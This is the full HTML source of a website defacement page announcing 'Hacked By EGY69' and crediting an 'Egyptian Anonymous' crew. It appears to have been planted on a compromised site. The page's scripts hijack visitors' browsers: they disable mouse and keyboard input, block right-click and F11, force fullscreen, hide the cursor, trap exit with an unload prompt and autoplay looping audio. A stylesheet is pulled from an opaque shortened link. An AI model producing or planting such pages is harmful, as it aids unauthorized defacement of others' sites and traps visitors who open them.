







<!DOCTYPE html>
<html>
  <head>
    <title>Hacked By EGY69</title>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="title" content="Hacked By UnM@SK">
    <meta name="description" content="Silenct Clown">
    <meta name="keywords" content="hacked,deface,wordpress,website,whitehat,blackhat,defacer,hack,mirror">
    <meta name="robots" content="index, follow">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="language" content="English">
    <meta name="revisit-after" content="60 days">
    <meta name="author" content="UnM@SK">
    <meta property="og:image" content="https://scontent.xx.fbcdn.net/v/t39.30808-1/300950512_447213487449304_3106314144854614662_n.jpg?stp=cp0_dst-jpg_p50x50&_nc_cat=102&ccb=1-7&_nc_sid=dbb9e7&_nc_ohc=jV73C1GKrjYAX_GoFcf&_nc_ht=scontent.xx&edm=ADwHzz8EAAAA&oh=00_AfA_TlvrTBpADCaWWNNsnvW-6Nc69zYTXK9H8mdJSJALcA&oe=63BB3464">
    <link rel='shortcut icon' href='https://scontent.xx.fbcdn.net/v/t39.30808-1/300950512_447213487449304_3106314144854614662_n.jpg?stp=cp0_dst-jpg_p50x50&_nc_cat=102&ccb=1-7&_nc_sid=dbb9e7&_nc_ohc=jV73C1GKrjYAX_GoFcf&_nc_ht=scontent.xx&edm=ADwHzz8EAAAA&oh=00_AfA_TlvrTBpADCaWWNNsnvW-6Nc69zYTXK9H8mdJSJALcA&oe=63BB3464' type='image/x-icon'>
    <meta name="theme-color" content="#000">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
    <style type='text/css'>
      body,
      a:hover {
        cursor: url(https://cur.cursors-4u.net/symbols/sym-1/sym46.cur), progress !important;
      }
    </style>
    <link rel="stylesheet" href="https://bit.ly/2UGCIC5">
  </head>
  <body bgcolor="black" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body" onload="typeWriter()">
    <style type="text/css">
      center {
        font-family: Courier;
      }

      img {
        opacity: 80%;
      }

      red {
        color: red;
      }

      #background-video {
        height: 100vh;
        width: 100vw;
        object-fit: cover;
        position: fixed;
        left: 0;
        right: 0;
        top: 0;
        bottom: 0;
        z-index: -1;
      }

      font {
        text-shadow: #000 0px 0px 3px;
        -webkit-font-smoothing: antialiased;
      }

      div {
        animation: glitch 1s linear infinite;
      }

      @keyframes glitch {

        2%,
        64% {
          transform: translate(2px, 0) skew(0deg);
        }

        4%,
        60% {
          transform: translate(-2px, 0) skew(0deg);
        }

        62% {
          transform: translate(0, 0) skew(5deg);
        }
      }

      div:before,
      div:after {
        content: attr(title);
        position: absolute;
        left: 0;
      }

      div:before {
        animation: glitchTop 1s linear infinite;
        clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
        -webkit-clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
      }

      @keyframes glitchTop {

        2%,
        64% {
          transform: translate(2px, -2px);
        }

        4%,
        60% {
          transform: translate(-2px, 2px);
        }

        62% {
          transform: translate(13px, -1px) skew(-13deg);
        }
      }

      div:after {
        animation: glitchBotom 1.5s linear infinite;
        clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
        -webkit-clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
      }

      @keyframes glitchBotom {

        2%,
        64% {
          transform: translate(-2px, 0);
        }

        4%,
        60% {
          transform: translate(-2px, 0);
        }

        62% {
          transform: translate(-22px, 5px) skew(21deg);
        }
      }
      red {
        color: red;
      }
    </style>
    <script language="JavaScript">
      window.onbeforeunload = confirmExit;

      function confirmExit() {
        return "Are you sure ? wkwk";
      }

      function fs() {
        var elem = document.documentElement;
        if (elem.requestFullscreen) {
          elem.requestFullscreen();
        } else if (elem.msRequestFullscreen) {
          elem.msRequestFullscreen();
        } else if (elem.mozRequestFullScreen) {
          elem.mozRequestFullScreen();
        } else if (elem.webkitRequestFullscreen) {
          elem.webkitRequestFullscreen();
        }
        document.getElementById("body").style.cursor = 'none';
        document.onkeydown = function(e) {
          return false;
        }
        document.addEventListener("keydown", e => {
          if (e.key == "F11") e.preventDefault();
        });
      }
    </script>
    <audio src="https://d.top4top.io/m_1832qerb21.mp3" autoplay="true" id="lagu" loop=""></audio>
    <table width="100%" height="80%">
      <td>
        <center><br><br><br>
          <img src="https://i.gifer.com/OVO.gif" width="350" height="250" loading="lazy" onerror="this.style.display = 'none'"><br>
          <br><b>Hacked By <red><i>EGY69</b></i></red><br>
          <font size="3" id="hekerbang?">~ Egyption Crew ~</font><br><br>
         
          </div>
<br>
<font size="3" color="gray">We Are</font>
<br><br>
 <font size="3" color="gray">- Egyptian Anonymous - </font>
 <br>
 <font size="3" color="gray"> Greatz </font>
<br>
<font size="2" color="gray">- Egyption cyber Security - Egyption Security Hacker -</font>
<br>
          <div class="footer-greetings">

            <center>
              <font size="2">
                <b>2023&copy EGY69 🖕
              </font></center>
            
          </div>
      </td>
    </table>